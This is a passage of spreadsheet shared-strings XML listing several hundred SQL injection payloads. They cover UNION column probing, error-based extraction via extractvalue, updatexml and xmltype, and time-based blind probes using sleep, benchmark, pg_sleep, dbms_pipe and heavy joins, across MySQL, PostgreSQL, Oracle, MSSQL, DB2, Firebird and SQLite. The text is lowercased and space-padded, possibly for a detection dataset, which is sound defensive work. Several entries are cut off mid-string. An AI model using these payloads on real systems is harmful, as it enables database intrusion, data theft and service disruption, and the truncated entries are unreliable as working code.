    <t>select  ( case when  ( 5740 = 7636 )  then 5740 else cast ( 1 as int ) / ( select 0 from dual )  end )  from dual--</t>
  </si>
  <si>
    <t>1' in boolean mode )  union all select null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>1'  )  )   )  and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 6055 = 6055 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and   (  (   ( 'abcf' like 'abcf</t>
  </si>
  <si>
    <t>1 and 3824 = benchmark ( 5000000,md5 ( 0x76555642  )  )  # igen</t>
  </si>
  <si>
    <t>1'  )  )   )  and char ( 107 ) ||char ( 121 ) ||char ( 97 ) ||char ( 80 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t xml:space="preserve">1 )  and 3715 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 3715 = 3715 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   ) </t>
  </si>
  <si>
    <t xml:space="preserve">1' )  and elt ( 3528 = 3566,3566 ) </t>
  </si>
  <si>
    <t>select benchmark ( 5000000,md5 ( 0x4c4d6142  )  )   and  ( '%' = '</t>
  </si>
  <si>
    <t>-3513%" union all select 8473,8473#</t>
  </si>
  <si>
    <t xml:space="preserve"> end and  ( "xksk" = "xksk</t>
  </si>
  <si>
    <t>-7505'  )  )   as lqvw where 8565 = 8565 or 6872 = 6872--</t>
  </si>
  <si>
    <t>1  )  )   as ambt where 5198 = 5198 and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>1'  )  )   and 8189 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>select  ( case when  ( 2774 = 5503 )  then 2774 else 2774* ( select 2774 from information_schema.character_sets )  end ) #</t>
  </si>
  <si>
    <t xml:space="preserve">-3475" or elt ( 5532 = 4242,4242 ) </t>
  </si>
  <si>
    <t>-3349  )  )   )  union all select 6553,6553#</t>
  </si>
  <si>
    <t>1' )  as xvcr where 6456 = 6456 and 3824 = benchmark ( 5000000,md5 ( 0x76555642  )  )  --</t>
  </si>
  <si>
    <t>1"  )  )   as khqq where 3637 = 3637 and 8407 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>1%" or 9643 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 )  and "%" = "</t>
  </si>
  <si>
    <t>-6045 or 8919 = 2827--</t>
  </si>
  <si>
    <t>1' )  as knxr where 5662 = 5662 union all select null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t xml:space="preserve">1' )  and  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 3484 = 3484,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   ) </t>
  </si>
  <si>
    <t>1%" )  rlike sleep ( 5 )  and  ( "%" = "</t>
  </si>
  <si>
    <t>1" )  rlike  ( select * from  ( select ( sleep ( 5  )  )   ) sgvo )  and  ( "cneo" like "cneo</t>
  </si>
  <si>
    <t>1"  )  )   as mvxa where 3024 = 3024</t>
  </si>
  <si>
    <t>1" )  as yekp where 3049 = 3049 and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>1'  )  )   as pgif where 6346 = 6346</t>
  </si>
  <si>
    <t>-7635" union all select 1284,1284,1284,1284,1284,1284#</t>
  </si>
  <si>
    <t>select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4</t>
  </si>
  <si>
    <t>1%" union all select null,null,null,null,null#</t>
  </si>
  <si>
    <t>1 )  as bhdj where 4472 = 4472</t>
  </si>
  <si>
    <t>-1808%"  )  )   or 4595 = 3545 and   (  (  "%" = "</t>
  </si>
  <si>
    <t>-2298%' or 1 group by concat ( 0x7171706a71, ( select  ( case when  ( 4232 = 4232 )  then 1 else 0 end  )  )  ,0x717a767a71,floor ( rand ( 0 ) *2  )  )   having min ( 0 ) #</t>
  </si>
  <si>
    <t>1" )  as xioc where 7260 = 7260 or elt ( 5873 = 5873,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t>1"  )  )   and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 7982 = 7982,1  )  )   ) ,0x717a767a71  )  )   and   (  (  "xccy" = "xccy</t>
  </si>
  <si>
    <t>-6333"  )  )   )  union all select 9851,9851,9851,9851,9851,9851--</t>
  </si>
  <si>
    <t>1%"  )  )   and elt ( 4249 = 4249,7259 )  and   (  (  "%" = "</t>
  </si>
  <si>
    <t>1'+ ( select 'cwta' where 6091 = 6091</t>
  </si>
  <si>
    <t>1%" )  and  ( 3020 = 3020 ) *6703 and  ( "%" = "</t>
  </si>
  <si>
    <t>1"  )  )   as bbkl where 5686 = 5686</t>
  </si>
  <si>
    <t xml:space="preserve"> end and   (  (  "%" = "</t>
  </si>
  <si>
    <t>select count ( * )  from generate_series ( 1,5000000 ) #</t>
  </si>
  <si>
    <t>1' and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4386 = 4386 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   and 'iuao' = 'iuao</t>
  </si>
  <si>
    <t>-3361  )  )   union all select 2827,2827,2827,2827#</t>
  </si>
  <si>
    <t>1" and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 3393 = 3393,1  )  )   ) ,0x717a767a71 ) ,1161 )  and "egzm" = "egzm</t>
  </si>
  <si>
    <t>1%"  )  )   and 6240 =  ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' )  and   (  (  "%" = "</t>
  </si>
  <si>
    <t>-3933'  )  )   )  union all select 6198,6198,6198,6198,6198#</t>
  </si>
  <si>
    <t>1" where 6800 = 6800 procedure analyse ( extractvalue ( 9627,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x4b774c75  )  )    )  )   ) ,1 ) #</t>
  </si>
  <si>
    <t>1"  )  )   )  ( select  ( case when  ( 5451 = 5451 )  then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null )  else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 )  end )  from information_schema.system_users )  and   (  (   ( "wjhj" = "wjhj</t>
  </si>
  <si>
    <t>1"  )  )   and char ( 107 ) ||char ( 121 ) ||char ( 97 ) ||char ( 80 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>1%' )  ( select  ( case when  ( 4587 = 4587 )  then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 )  end )  from  ( values ( 0  )  )   )  and  ( '%' = '</t>
  </si>
  <si>
    <t xml:space="preserve">iif ( 3204 = 8489,3204,1/0 ) </t>
  </si>
  <si>
    <t>1%'  )  )   )  union all select null,null,null,null#</t>
  </si>
  <si>
    <t>select case when 7426 = 6635 then 1 else null end--</t>
  </si>
  <si>
    <t>select  ( case when  ( 9540 = 5786 )  then 9540 else 9540* ( select 9540 from information_schema.character_sets )  end ) #</t>
  </si>
  <si>
    <t>-7648' )  or 3440 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 3440 = 3440 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )</t>
  </si>
  <si>
    <t>select  ( case when  ( 6615 = 3564 )  then 1 else 6615* ( select 6615 from master..sysdatabases )  end ) --</t>
  </si>
  <si>
    <t>-4082  )  )   or 5903 =  ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' )  and   (  (  7874 = 7874</t>
  </si>
  <si>
    <t>-3081"  )  )   )  or 3736 = 1899</t>
  </si>
  <si>
    <t>-8791"  )  )   )  or make_set ( 6681 = 6620,6620 )  and   (  (   ( "pvdk" = "pvdk</t>
  </si>
  <si>
    <t>-8893%'  )  )   or elt ( 1032 = 1032,3623 )  and   (  (  '%' = '</t>
  </si>
  <si>
    <t>1"  )  )   as fhlg where 1004 = 1004 and 2853 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 2853 = 2853 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric ) --</t>
  </si>
  <si>
    <t>1 )  where 5774 = 5774</t>
  </si>
  <si>
    <t>-2323" )  as zgsn where 9274 = 9274 or 3440 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 3440 = 3440 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr</t>
  </si>
  <si>
    <t>-7859 )  as ipdg where 4413 = 4413 or 9323 = 9323#</t>
  </si>
  <si>
    <t>1 union all select null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>-7111' or  ( 8459 = 8459 ) *4906</t>
  </si>
  <si>
    <t>select  ( case when  ( 5390 = 7419 )  then 5390 else 5390* ( select 5390 from mysql.db )  end ) #</t>
  </si>
  <si>
    <t>-4817 union all select 7415,7415,7415,7415,7415,7415,7415,7415,7415#</t>
  </si>
  <si>
    <t>1 )  union all select null,null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>-9881"  )  )   or 9850 = 8118#</t>
  </si>
  <si>
    <t xml:space="preserve">1, ( select  ( case when  ( 3888 = 3888 )  then  ( select count ( * )  from generate_series ( 1,5000000  )  )   else 1/ ( select 0 )  end  )  )  </t>
  </si>
  <si>
    <t>1%' or 7552 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )  and '%' = '</t>
  </si>
  <si>
    <t>1%' and 7756 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 7756 = 7756 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and '%' = '</t>
  </si>
  <si>
    <t>-9135"  )  )   or 6872 = 6872 and   (  (  "fllx" = "fllx</t>
  </si>
  <si>
    <t>1' )  as ibqr where 5372 = 5372 and 8312 = dbms_pipe.receive_message ( chr ( 69 ) ||chr ( 79 ) ||chr ( 101 ) ||chr ( 68 ) ,5 ) --</t>
  </si>
  <si>
    <t>-9295  )  )   )  or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 1570 = 1570 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +cha</t>
  </si>
  <si>
    <t>1' )  where 7587 = 7587 or 8421 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>-7482%"  )  )   or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 1570 = 1570 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char</t>
  </si>
  <si>
    <t>1 where 9872 = 9872</t>
  </si>
  <si>
    <t>1' union all select null,null,null--</t>
  </si>
  <si>
    <t>-3234%"  )  )   or elt ( 1032 = 1032,3623 )  and   (  (  "%" = "</t>
  </si>
  <si>
    <t>1'|| ( select 'wadx' where 4287 = 4287 or sleep ( 5 ) #</t>
  </si>
  <si>
    <t>1 )  where 1402 = 1402</t>
  </si>
  <si>
    <t>1' and 1541 = 6868#</t>
  </si>
  <si>
    <t>1  )  )   as muyz where 6105 = 6105</t>
  </si>
  <si>
    <t>-9826 where 4103 = 4103 order by 1#</t>
  </si>
  <si>
    <t>-8209 )  or 1 group by concat ( 0x7171706a71, ( select  ( case when  ( 4232 = 4232 )  then 1 else 0 end  )  )  ,0x717a767a71,floor ( rand ( 0 ) *2  )  )   having min ( 0 ) #</t>
  </si>
  <si>
    <t>-8950"  )  )   as uahs where 2113 = 2113 union all select 2113,2113,2113,2113,2113,2113,2113,2113,2113,2113#</t>
  </si>
  <si>
    <t>-6233' )  where 9820 = 9820 or 3038 = 3038</t>
  </si>
  <si>
    <t>-4076'  )  )   union all select 9030,9030,9030,9030,9030,9030,9030,9030,9030,9030--</t>
  </si>
  <si>
    <t>-5859 )  as ernq where 8394 = 8394 union all select 8394,8394,8394--</t>
  </si>
  <si>
    <t>1" )  and 3707 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 )  and  ( "pfea" = "pfea</t>
  </si>
  <si>
    <t>-4892%'  )  )   or 2251 = 9881--</t>
  </si>
  <si>
    <t>1'|| ( select 'svbf' where 7017 = 7017 or elt ( 6272 = 6272,sleep ( 5  )  )   ) ||'</t>
  </si>
  <si>
    <t>-9840'  )  )   or 4747 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4747 = 4747 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr (</t>
  </si>
  <si>
    <t>1"  )  )   or exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 6270 = 6270,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   and   (  (  "oxvw" = "oxvw</t>
  </si>
  <si>
    <t>1"  )  )   as rcse where 4559 = 4559 and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 7982 = 7982,1  )  )   ) ,0x717a767a71  )  )  --</t>
  </si>
  <si>
    <t>1%"  )  )   and 8635 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t xml:space="preserve">1 )  and  ( select * from  ( select ( sleep ( 5  )  )   ) fzno ) </t>
  </si>
  <si>
    <t>-9656" union all select 8735,8735--</t>
  </si>
  <si>
    <t xml:space="preserve">-6095" )  as hygc where 8142 = 8142 or 2724 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 2724 = 2724 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) </t>
  </si>
  <si>
    <t>-2319 union all select 5068,5068,5068#</t>
  </si>
  <si>
    <t>-3100' )  or 4144 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4144 = 4144 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 1</t>
  </si>
  <si>
    <t>1'|| ( select 'oyyu' where 6765 = 6765 or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 1808 = 1808,1  )  )   ) ,0x717a767a71 ) ,8666  )  )  ||'</t>
  </si>
  <si>
    <t>1' where 8749 = 8749 or 8421 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>1" )  as xylo where 2112 = 2112 and 3715 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 3715 = 3715 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>-9859"  )  )   )  union all select 6595,6595,6595,6595,6595,6595,6595#</t>
  </si>
  <si>
    <t>1 where 3902 = 3902 or 9643 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>' or '1'  =  '1</t>
  </si>
  <si>
    <t>1'  )  )   ( select  ( case when  ( 4587 = 4587 )  then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 )  end )  from  ( values ( 0  )  )   )  and   (  (  'dpdz' like 'dpdz</t>
  </si>
  <si>
    <t>1  )  )   procedure analyse ( extractvalue ( 9627,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x4b774c75  )  )    )  )   ) ,1 ) #</t>
  </si>
  <si>
    <t>1 )  as lisg where 5490 = 5490</t>
  </si>
  <si>
    <t>1'  )  )   and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 7982 = 7982,1  )  )   ) ,0x717a767a71  )  )   and   (  (  'mwyu' = 'mwyu</t>
  </si>
  <si>
    <t>1 )  as gbtj where 8175 = 8175</t>
  </si>
  <si>
    <t>1"  )  )   )  or  ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9173 = 9173,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )  and   (  (   ( "hkjm" like "hkjm</t>
  </si>
  <si>
    <t>-6158" )  union all select 3084,3084,3084,3084,3084,3084#</t>
  </si>
  <si>
    <t>-1184"  )  )   )  union all select 1482--</t>
  </si>
  <si>
    <t>-5137 )  or 9323 = 9323#</t>
  </si>
  <si>
    <t>1%" )  or 4240 =  ( select 4240 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>select  ( case when  ( 3676 = 8635 )  then 3676 else 1/ ( select 0 )  end ) --</t>
  </si>
  <si>
    <t>select  ( case when  ( 6961 = 7460 )  then 1 else 6961* ( select 6961 from master..sysdatabases )  end ) --</t>
  </si>
  <si>
    <t>1"  )  )   or exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 6270 = 6270,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   and   (  (  "nwzu" like "nwzu</t>
  </si>
  <si>
    <t>1%' order by 1#</t>
  </si>
  <si>
    <t>1' where 7104 = 7104 union all select null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>1'|| ( select 'ftey' where 1363 = 1363 and  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 3484 = 3484,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )    )  )  ||'</t>
  </si>
  <si>
    <t>1"  )  )   as osuh where 8809 = 8809</t>
  </si>
  <si>
    <t>1"  )  )   and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 )  and   (  (  "nbfe" = "nbfe</t>
  </si>
  <si>
    <t>1' where 5702 = 5702 and elt ( 3114 = 3114,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t>1" where 7739 = 7739 and sleep ( 5 ) --</t>
  </si>
  <si>
    <t>1" )  where 6897 = 6897</t>
  </si>
  <si>
    <t>1' )  and 9198 = 9198--</t>
  </si>
  <si>
    <t>-8982' in boolean mode )  union all select 5367,5367,5367,5367,5367,5367#</t>
  </si>
  <si>
    <t>select  ( case when  ( 9455 = 6007 )  then 9455 else 9455* ( select 9455 from mysql.db )  end ) #</t>
  </si>
  <si>
    <t>-3598 )  union all select 2264#</t>
  </si>
  <si>
    <t>1' )  rlike sleep ( 5 ) #</t>
  </si>
  <si>
    <t>1%'  )  )   and elt ( 3114 = 3114,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t>1%'  )  )   )  and 2388 = benchmark ( 5000000,md5 ( 0x6d457153  )  )  #</t>
  </si>
  <si>
    <t xml:space="preserve">1" or elt ( 6272 = 6272,sleep ( 5  )  )  </t>
  </si>
  <si>
    <t>-3279" union all select 8568,8568,8568,8568--</t>
  </si>
  <si>
    <t>-8629 where 8049 = 8049 union all select 8049,8049,8049,8049,8049,8049,8049#</t>
  </si>
  <si>
    <t>-3829%" )  union all select 2218,2218,2218,2218,2218,2218,2218--</t>
  </si>
  <si>
    <t>1%' or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and '%' = '</t>
  </si>
  <si>
    <t>-3391' union all select 2024,2024--</t>
  </si>
  <si>
    <t>call regexp_substring ( repeat ( right ( char ( 3702 ) ,0 ) ,500000000 ) ,null )  and   (  (  "%" = "</t>
  </si>
  <si>
    <t>1"  )  )   )  or elt ( 5873 = 5873,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t>1%" )  and  ( 6016 = 4763 ) *4763 and  ( "%" = "</t>
  </si>
  <si>
    <t>1%"  )  )   )  and 7533 = 7533 and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>1" )  and  ( 3020 = 3020 ) *6703 and  ( "hkjf" = "hkjf</t>
  </si>
  <si>
    <t>-3899' )  where 8152 = 8152 or 3440 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 3440 = 3440 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 )</t>
  </si>
  <si>
    <t>1' )  where 6672 = 6672 union all select null,null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>1 where 7051 = 7051 or 4411 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>1%" and 2388 = benchmark ( 5000000,md5 ( 0x6d457153  )  )  #</t>
  </si>
  <si>
    <t xml:space="preserve">1', ( select  ( case when  ( 2106 = 2106 )  then  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )  else 2106* ( select 2106 from master..sysdatabases )  end  )  )  </t>
  </si>
  <si>
    <t>-1603'  )  )   or 5903 =  ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' )  and   (  (  'abmo' = 'abmo</t>
  </si>
  <si>
    <t>-1065  )  )   union all select 7437,7437,7437,7437,7437,7437,7437,7437--</t>
  </si>
  <si>
    <t>1%"  )  )   )  or 8514 = benchmark ( 5000000,md5 ( 0x544d5a4c  )  )  #</t>
  </si>
  <si>
    <t>1%'  )  )   )  and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 3393 = 3393,1  )  )   ) ,0x717a767a71 ) ,1161 )  and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>1'  )  )   as eymg where 7000 = 7000</t>
  </si>
  <si>
    <t>1'+ ( select 'qrml' where 3791 = 3791 or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   ) +'</t>
  </si>
  <si>
    <t>1%"  )  )   and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 3393 = 3393,1  )  )   ) ,0x717a767a71 ) ,1161 )  and   (  (  "%" = "</t>
  </si>
  <si>
    <t>-6865 )  or  ( 8459 = 8459 ) *4906 and  ( 6107 = 6107</t>
  </si>
  <si>
    <t>1'+ ( select 'zohk' where 5502 = 5502 or 2367 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>1' )  and 6240 =  ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' )  and  ( 'vhqm' = 'vhqm</t>
  </si>
  <si>
    <t>1'|| ( select 'wyng' from dual where 2157 = 2157 union all select null,null--</t>
  </si>
  <si>
    <t>1 and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 ) -- kfqs</t>
  </si>
  <si>
    <t>1 union all select null,null#</t>
  </si>
  <si>
    <t>-9514  )  )   as xdkw where 4975 = 4975 union all select 4975,4975,4975,4975#</t>
  </si>
  <si>
    <t>1%"  )  )   and 3707 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 )  and   (  (  "%" = "</t>
  </si>
  <si>
    <t>1 )  where 7199 = 7199 and 8407 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>1" )  where 1330 = 1330 or  ( select * from  ( select ( sleep ( 5  )  )   ) ydpu ) --</t>
  </si>
  <si>
    <t>1'  )  )   or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and   (  (  'acly' like 'acly</t>
  </si>
  <si>
    <t>1' and  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 3484 = 3484,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   )  and 'wjwn' = 'wjwn</t>
  </si>
  <si>
    <t>1'  )  )   and make_set ( 8245 = 9872,9872 )  and   (  (  'kzgt' = 'kzgt</t>
  </si>
  <si>
    <t>1' where 7191 = 7191 rlike sleep ( 5 ) --</t>
  </si>
  <si>
    <t>1'|| ( select 'cclo' from dual where 6823 = 6823 and 9198 = 9198--</t>
  </si>
  <si>
    <t>1' and 5967 = 4184#</t>
  </si>
  <si>
    <t>1'  )  )   )  and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4386 = 4386 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   and   (  (   ( 'smrw' like 'smrw</t>
  </si>
  <si>
    <t>1" )  where 7010 = 7010 and 9660 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>-3697'  )  )   )  union all select 5180,5180,5180,5180,5180,5180,5180--</t>
  </si>
  <si>
    <t>select dbms_pipe.receive_message ( chr ( 66 ) ||chr ( 67 ) ||chr ( 79 ) ||chr ( 101 ) ,5 )  from dual ) ||'</t>
  </si>
  <si>
    <t>-5827" )  as lskq where 7683 = 7683 union all select 7683,7683,7683,7683,7683#</t>
  </si>
  <si>
    <t>1 )  as biup where 1414 = 1414 union all select null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>1 )  and 6240 =  ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' )  and  ( 3945 = 3945</t>
  </si>
  <si>
    <t>1'  )  )   or elt ( 5873 = 5873,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t>1'+ ( select 'rryx' where 1228 = 1228 union all select null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>select dbms_pipe.receive_message ( chr ( 66 ) ||chr ( 67 ) ||chr ( 79 ) ||chr ( 101 ) ,5 )  from dual and "ulfr" like "ulfr</t>
  </si>
  <si>
    <t>-6637'  )  )   order by 1#</t>
  </si>
  <si>
    <t xml:space="preserve">-5243" where 2105 = 2105 or 4144 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4144 = 4144 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( </t>
  </si>
  <si>
    <t>1' where 6913 = 6913 and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4386 = 4386 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )  --</t>
  </si>
  <si>
    <t>-9795 )  as wrgs where 5427 = 5427 union all select 5427,5427,5427,5427,5427,5427--</t>
